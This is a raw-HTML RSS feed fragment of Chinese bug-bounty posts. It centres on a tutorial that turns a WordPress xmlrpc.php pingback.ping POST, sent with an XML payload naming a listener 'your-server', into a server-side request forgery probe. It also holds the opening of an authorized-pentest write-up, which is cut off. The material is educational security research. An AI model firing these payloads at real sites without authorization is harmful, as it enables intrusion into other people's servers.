href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">‍</a></span></span></p><h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=cf9d1106&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F7xtecWUgCRy4M8Ijq1HaJaNJZspTyaUneKghYkhFNiaopaQyJLkKwPcm6XLswgjUkekUcJqZ9du4ZcUgK3ZRdrkibM6yT2hdT2ib9FXJY5D3KY%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style="box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span leaf="">参考</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><a href="https://hackerone.com/reports/736391" target="_blank">https://hackerone.com/reports/736391</a></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=bb3d4e7b&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzIzMTIzNTM0MA%3D%3D%26mid%3D2247499431%26idx%3D1%26sn%3D0ddec433ea7ac571491c0cb05a89baca">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 12 May 2026 10:03:00 +0800</pubDate>
    </item>
    <item>
      <title>ssrf的一个另类思路</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247499425&amp;idx=1&amp;sn=c5f5cdec52e6db81137772ca5e2f580a</link>
      <description></description>
      <content:encoded><![CDATA[<p>原创 <span>h1</span> <span>2026-05-11 10:01</span> <span style="display: inline-block;">四川</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=c45ccae6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F7xtecWUgCRxIvwtY0IOUxXccKPzq5mga0rVXR3ZdhhJemK0rXdqHKicGuhAMOSXlUb4SGbnQfKL6IDeoOYCzl2yP540KJJNoI4anw9ly7gGQ%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">HTML Entity 绕过</span></p><h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset; text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=c81a62e2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F7xtecWUgCRxiayTb43hSzibvojcictic9CWbky7M2yRAvFpSrByLlbe2UotVR2e1IP7rnlQARoicU2FibBXQBBUMy3C8LPvhibFbqMsewUp2XnAXmY%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style=" box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px; text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset; "><span leaf="">正文</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">1.在 VPS 上启动 interact.sh 服务，或者使用 Burp Suite Collaborator。</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">2.访问：</span><code style="box-sizing: border-box;font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size: 14px;cursor: pointer;color: rgb(40, 202, 113);line-height: 1.8em;letter-spacing: 0em;background: none left top / auto no-repeat scroll padding-box border-box rgba(27, 31, 35, 0.05);width: auto;height: auto;margin: 0px 2px;padding: 2px 4px;border-style: none;border-width: 3px;border-color: rgb(0, 0, 0) rgba(0, 0, 0, 0.4) rgba(0, 0, 0, 0.4);border-radius: 4px;overflow-wrap: break-word;word-break: break-all;"><span leaf=""><a href="https://███/xmlrpc.php" target="_blank">https://███/xmlrpc.php</a></span></code></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">页面返回：</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size: 14px;cursor: pointer;color: rgb(40, 202, 113);line-height: 1.8em;letter-spacing: 0em;background: none left top / auto no-repeat scroll padding-box border-box rgba(27, 31, 35, 0.05);width: auto;height: auto;margin: 0px 2px;padding: 2px 4px;border-style: none;border-width: 3px;border-color: rgb(0, 0, 0) rgba(0, 0, 0, 0.4) rgba(0, 0, 0, 0.4);border-radius: 4px;overflow-wrap: break-word;word-break: break-all;"><span leaf="">XML-RPC server accepts POST requests only.</span></code></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">1.使用 Burp Suite，把该请求发送到 Repeater。</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">2.将请求方法改为 POST。</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">3.获取你的监听服务器 URL，并使用以下 XML payload：</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">&lt;?xml version=</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;1.0&#34;</span></span><span leaf=""> encoding=</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;UTF-8&#34;</span></span><span leaf="">?&gt;</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">&lt;methodCall&gt;</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">  &lt;methodName&gt;pingback.ping&lt;/methodName&gt;</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">  &lt;params&gt;</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">    &lt;param&gt;</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">      &lt;value&gt;&lt;string&gt;<a href="https://your-server" target="_blank">https://your-server</a>&lt;/string&gt;&lt;/value&gt;</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">    &lt;/param&gt;</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">    &lt;param&gt;</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">      &lt;value&gt;&lt;string&gt;<a href="https://█████/" target="_blank">https://█████/</a>&lt;/string&gt;&lt;/value&gt;</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">    &lt;/param&gt;</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">  &lt;/params&gt;</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">&lt;/methodCall&gt;</span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">1.发送 POST 请求。</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">2.在你的服务器日志中可以看到来自目标服务器的请求。</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">这里ssrf的思路有点另类,将请求方法改变</span></p><p style="text-align: center;" data-pm-slice="2 2 []"><span leaf="">如果你是一个长期主义者，欢迎加入我的知识星球，本星球日日更新,包含号主大量一线实战,全网独一无二，微信识别二维码付费即可加入，如不满意，72 小时内可在 App 内无条件自助退款</span></p><p style="text-align: center;" data-pm-slice="2 2 []"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100012574" data-ratio="0.5493333333333333" data-s="300,640" data-w="750" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=033161f8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FYmmVSe19Qj5EMr3X76qdKBrhIIkBlVVyuiaiasseFZ9LqtibyKFk7gXvgTU2C2yEwKLaaqfX0DL3eoH6gTcNLJvDQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><span style="box-sizing: border-box;text-align: center;display: inline-block;height: 38px;line-height: 42px;color: rgb(72, 179, 120);background-position: left center;background-repeat: no-repeat;background-attachment: initial;background-origin: initial;background-clip: initial;background-size: 63px;margin-top: 38px;font-size: 18px;margin-bottom: 10px;"><span leaf="">往期回顾</span></span></p><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497813&amp;idx=1&amp;sn=c778ad6a4bffd7a0a72a900144ea90ca&amp;scene=21#wechat_redirect" textvalue="如何利用ai辅助挖漏洞" data-itemshowtype="0" linktype="text" data-linktype="2">如何利用ai辅助挖漏洞</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497880&amp;idx=1&amp;sn=b9b980464333074216b55ea94c8a743a&amp;scene=21#wechat_redirect" textvalue="如何在移动端抓包-下" data-itemshowtype="0" linktype="text" data-linktype="2">如何在移动端抓包-下</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;h1&#34;,&#34;attributes&#34;:{&#34;id&#34;:&#34;activity-name&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497491&amp;idx=1&amp;sn=a1b00b9a8a54eb96aa3ba8bf23cb7e28&amp;scene=21#wechat_redirect" textvalue="如何绕过签名校验" data-itemshowtype="0" linktype="text" data-linktype="2">如何绕过签名校验</a></span></h1><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495880&amp;idx=1&amp;sn=65d42fbff5e198509e55072674ac5283&amp;chksm=e8a5faabdfd273bd55df8f7db3d644d3102d7382020234741e37ca29e963eace13dd17fcabdd&amp;scene=21#wechat_redirect" textvalue="一款bp神器" data-itemshowtype="0" linktype="text" data-linktype="2">一款bp神器</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496898&amp;idx=1&amp;sn=b6088e20a8b4fc9fbd887b900d8c5247&amp;scene=21#wechat_redirect" textvalue="挖掘有回显ssrf的隐藏payload" data-itemshowtype="0" linktype="text" data-linktype="2">挖掘有回显ssrf的隐藏payload</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495841&amp;idx=1&amp;sn=bbf477afa30391b8072d23469645d026&amp;chksm=e8a5fac2dfd273d42344f18c7c6f0f7a158cca94041c4c4db330c3adf2d1f77f062dcaf6c5e0&amp;scene=21#wechat_redirect" textvalue="ssrf绕过新思路" data-itemshowtype="0" linktype="text" data-linktype="2">ssrf绕过新思路</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496380&amp;idx=1&amp;sn=78c0c4c67821f5ecbe4f3947b567eeec&amp;chksm=e8a5f8dfdfd271c935aeb4444ea7e928c55cb4c823c51f1067f267699d71a1aad086cf203b99&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">一个辅助测试ssrf的工具</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247488819&amp;idx=1&amp;sn=5141f88f3e70b9c97e63a4b68689bf6e&amp;chksm=e8a61f50dfd1964692f93412f122087ac160b743b4532ee0c1e42a83039de62825ebbd066a1e&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">dom-xss精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487187&amp;idx=1&amp;sn=622438ee6492e4c639ebd8500384ab2f&amp;chksm=e8a604b0dfd18da6c459b4705abd520cc2259a607dd9306915d845c1965224cc117207fc6236&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">年度精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487122&amp;idx=1&amp;sn=32459310408d126aa43240673b8b0846&amp;chksm=e8a604f1dfd18de737769dd512ad4063a3da328117b8a98c4ca9bc5b48af4dcfa397c667f4e3&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">Nuclei权威指南-如何躺赚</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486973&amp;idx=1&amp;sn=6ec419db11ff93d30aa2fbc04d8dbab6&amp;chksm=e8a6079edfd18e88f6236e237837ee0d1101489d52f2abb28532162e2937ec4612f1be52a88f&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试设置功能IV</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试注册功能以及相关Tips</a></span><span style="display: none;line-height: 0px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">‍</a></span></span></p><h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset; text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=a43e010f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F7xtecWUgCRwNNOy4MwpQGXhibD4YyMNAPrMXeDrcmm9lSymKR6fOEmZcEmficiaiaEU91O5g9C0RvubmrlWGUaLQZFwJmaicuKQam8WricM2pTxm4%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style=" box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px; text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset; "><span leaf="">参考</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><a href="https://hackerone.com/reports/1890719" target="_blank">https://hackerone.com/reports/1890719</a></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=5991a05a&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzIzMTIzNTM0MA%3D%3D%26mid%3D2247499425%26idx%3D1%26sn%3Dc5f5cdec52e6db81137772ca5e2f580a">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 11 May 2026 10:01:00 +0800</pubDate>
    </item>
    <item>
      <title>有意思的逻辑缺陷</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247499419&amp;idx=1&amp;sn=6be89b80e7a9669ce7ee55b5be52b5f6</link>
      <description></description>
      <content:encoded><![CDATA[<p><span>pippybear</span> <span>2026-05-08 10:01</span> <span style="display: inline-block;">四川</span></p>




  <p>以下文章来源于：安全无界</p>
  <strong>安全无界</strong>
  <p>面向年轻的网络安全爱好者，分享网络安全技术、工具和趋势。</p>



  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=85e7aaac&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F7xtecWUgCRxf3p27SibbH1oDRePwIgfl6gmbT1rOzoocdx4OQPricNBQ9putPAjCTSicicuvB17UWicXX7ibDE6xWNguwn7UEb3fX2YlnrRs9O1q4%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <p data-mpa-powered-by="yiban.io" data-pm-slice="3 3 []" style="margin-bottom: 24px;"><span style="letter-spacing: 0.578px;"><span leaf="">声明：</span></span><span style="letter-spacing: 0.578px;"><span leaf="">请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果</span></span><span style="letter-spacing: 0.578px;"><span leaf="">与文章作者和本公众号无关。</span></span></p><p style="text-indent: 2em;margin-bottom: 24px;"><span leaf="">这是很久之前的一次授权渗透测试，测试目标是客户的人才系统，粗略的看了一下有注册功能，舒服，终于不是从0开始的局面了。</span></p><p style="text-align: center;margin-bottom: 24px;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100001943" data-ratio="1.236503856041131" data-s="300,640" type="block" data-type="png" data-w="778" style="width:335px;height:414px;" src="https://wechat2rss.xlab.app/img-proxy/?k=7fd6b4a7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F72I8gAalpPUJtoib6OjMZ1dpDQPfPGtBhbVbWoLAaE1akeQVeo0TAkDlCvwVwFzgTk8hiaiclAhDnPgqibmoOTzJUYicYrVLFtbkDfl6ktuLKicdc%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;margin-bottom: 24px;"><span leaf="">废话不多说，直接开始正文，有注册功能，那必须先注册一个用户登进系统瞅瞅。</span></p><p style="text-align: center;margin-bottom: 24px;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100001944" data-ratio="1.0468085106382978" data-s="300,640" type="block" data-type="png" data-w="940" style="width:375px;height:393px;" 